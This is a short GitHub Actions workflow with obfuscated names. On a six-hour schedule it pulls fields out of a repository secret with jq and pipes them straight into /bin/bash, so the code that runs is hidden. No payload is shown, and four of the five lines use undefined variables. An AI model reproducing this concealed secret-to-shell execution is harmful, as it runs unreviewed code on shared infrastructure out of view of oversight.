name: haotuguinong

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haotuguinong
        env:
          lbdlj8955: ${{ secrets.lbdlj8955 }}
        run: |
          echo $lbdlj8955 | jq -r .xjp39019 | /bin/bash
          echo $fl9 | jq -r .ige4352 | /bin/bash
          echo $vpff187 | jq -r .q511 | /bin/bash
          echo $wpvxa22318 | jq -r .mekz02216 | /bin/bash
          echo $kd51458 | jq -r .ltcer02309 | /bin/bash

